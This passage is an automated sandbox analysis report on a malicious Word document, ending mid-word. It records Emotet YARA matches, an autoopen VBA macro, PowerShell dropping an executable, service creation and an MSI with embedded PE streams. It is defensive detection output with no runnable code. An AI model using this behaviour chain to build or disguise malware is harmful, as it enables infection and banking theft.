Source: 0000000A.00000002.2886137391.00000000001E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1942360455.0000000000DE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2886079158.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1961622086.0000000000711000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1964755289.00000000007E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Emotet in memory Author: JPCERT/CC Incident Response Group
Document contains OLE streams with PE executablesShow sources
Source: 6d2d18.msi.18.drStream path '\x17163\x16689\x18229\x16446\x18156\x14988' : MZ signature found
Source: 6d2d18.msi.18.drStream path '\x17163\x16689\x18229\x16446\x18156\x14988\x18175\x14598' : MZ signature found
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\20.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2045
Contains functionality to delete servicesShow sources
Source: C:\Users\user\20.exeCode function: 8_2_00FAB32E GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,8_2_00FAB32E
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\20.exeCode function: 8_2_00FA1D2B CreateProcessAsUserW,CreateProcessW,8_2_00FA1D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\sspiresize.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\sspiresize.exeMutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\20.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4892:120:WilError_01
Source: C:\Users\user\20.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Deletes files inside the Windows folderShow sources
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3BEE.tmpJump to behavior
Detected potential crypto functionShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECode function: 0_3_0D304D100_3_0D304D10
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECode function: 0_3_110B21580_3_110B2158
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECode function: 0_2_003861320_2_00386132
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECode function: 0_2_003863940_2_00386394
Source: C:\Users\user\20.exeCode function: 7_2_004109007_2_00410900
Source: C:\Users\user\20.exeCode function: 7_2_004031107_2_00403110
Source: C:\Users\user\20.exeCode function: 7_2_0040F2507_2_0040F250
Source: C:\Users\user\20.exeCode function: 7_2_004092807_2_00409280
Source: C:\Users\user\20.exeCode function: 7_2_00410A907_2_00410A90
Source: C:\Users\user\20.exeCode function: 7_2_004112B07_2_004112B0
Source: C:\Users\user\20.exeCode function: 7_2_00417B807_2_00417B80
Source: C:\Users\user\20.exeCode function: 7_2_004137607_2_00413760
Source: C:\Users\user\20.exeCode function: 8_2_004109008_2_00410900
Source: C:\Users\user\20.exeCode function: 8_2_004031108_2_00403110
Source: C:\Users\user\20.exeCode function: 8_2_0040F2508_2_0040F250
Source: C:\Users\user\20.exeCode function: 8_2_004092808_2_00409280
Source: C:\Users\user\20.exeCode function: 8_2_00410A908_2_00410A90
Source: C:\Users\user\20.exeCode function: 8_2_004112B08_2_004112B0
Source: C:\Users\user\20.exeCode function: 8_2_00417B808_2_00417B80
Source: C:\Users\user\20.exeCode function: 8_2_004137608_2_00413760
Source: C:\Users\user\20.exeCode function: 8_2_00FA37A98_2_00FA37A9
Source: C:\Users\user\20.exeCode function: 8_2_00FA37A58_2_00FA37A5
Source: C:\Users\user\20.exeCode function: 8_2_00FA2F828_2_00FA2F82
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_004109009_2_00410900
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_004031109_2_00403110
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_0040F2509_2_0040F250
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_004092809_2_00409280
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_00410A909_2_00410A90
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_004112B09_2_004112B0
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_00417B809_2_00417B80
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_004137609_2_00413760
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_001E28C19_2_001E28C1
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_001E30E89_2_001E30E8
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 9_2_001E30E49_2_001E30E4
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_0041090010_2_00410900
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_0040311010_2_00403110
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_0040F25010_2_0040F250
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_0040928010_2_00409280
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_00410A9010_2_00410A90
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_004112B010_2_004112B0
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_00417B8010_2_00417B80
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_0041376010_2_00413760
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001D28C110_2_001D28C1
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001D30E810_2_001D30E8
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001D30E410_2_001D30E4
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E2F8210_2_001E2F82
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E37A910_2_001E37A9
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: 10_2_001E37A510_2_001E37A5
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9B84AB27_2_6E9B84AB
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6EA0AA8A27_2_6EA0AA8A
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9E4BB127_2_6E9E4BB1
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9FABA827_2_6E9FABA8
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6EA048C427_2_6EA048C4
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9F878027_2_6E9F8780
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9DE45C27_2_6E9DE45C
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9F855127_2_6E9F8551
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6EA0038527_2_6EA00385
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9E980E27_2_6E9E980E
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E99142327_2_6E991423
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9BD3BD27_2_6E9BD3BD
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9E73AC27_2_6E9E73AC
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: S_974960546330.docOLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module Gyrfvjiwa, Function autoopenName: autoopen
Document contains embedded VBA macrosShow sources
Source: S_974960546330.docOLE indicator, VBA macros: true
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: 6d2d18.msi.18.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Enables security privilegesShow sources
Source: C:\Windows\System32\msiexec.exeProcess token adjusted: SecurityJump to behavior
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E9AD565 appears 114 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E9DCBF6 appears 33 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E9DC823 appears 196 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E9DC859 appears 56 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E9DC7F0 appears 166 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E995D8A appears 32 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E9DC062 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E99497E appears 156 times
Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 6E9DC88F appears 31 times
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Users\user\20.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\20.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\sspiresize.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\sspiresize.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Yara signature matchShow sources
Source: 00000008.00000002.1964883162.0000000000FA1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1960840461.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1942402576.0000000000DF1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2886137391.00000000001E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1942360455.0000000000DE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2886079158.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1961622086.0000000000711000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1964755289.00000000007E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: 20.exe.5.drStatic PE information: Section: .data ZLIB complexity 0.990749289773
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.expl.evad.winDOC@19/47@4/4
Contains functionality to create servicesShow sources
Source: C:\Users\user\20.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,8_2_00FAB3FE
Source: C:\Windows\SysWOW64\sspiresize.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,10_2_001EB3FE
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\20.exeCode function: 8_2_00FA1943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,8_2_00FA1943
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9D03A4 __EH_prolog3_GS,CoCreateInstance,__CxxThrowException@8,_free,27_2_6E9D03A4
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 27_2_6E9BBDF7 FindResourceW,SizeofResource,LoadResource,27_2_6E9BBDF7
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\20.exeCode function: 8_2_00FAB3FE OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,8_2_00FAB3FE
Creates files inside the program directoryShow sources
Source: C:\Windows\System32\msiexec.exeFile created: c:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig-office.xrm-msJump to behavior
Creates files inside the user directoryShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{AAB6FC61-1F7A-42D6-8FA9-2DA8F4AA3320} - OProcSessId.datJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: S_974960546330.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: S_974960546330.docOLE document summary: edited time not present or 0
Source: 6d2d18.msi.18.drOLE document summary: edited time not present or 0
Parts of this applicatio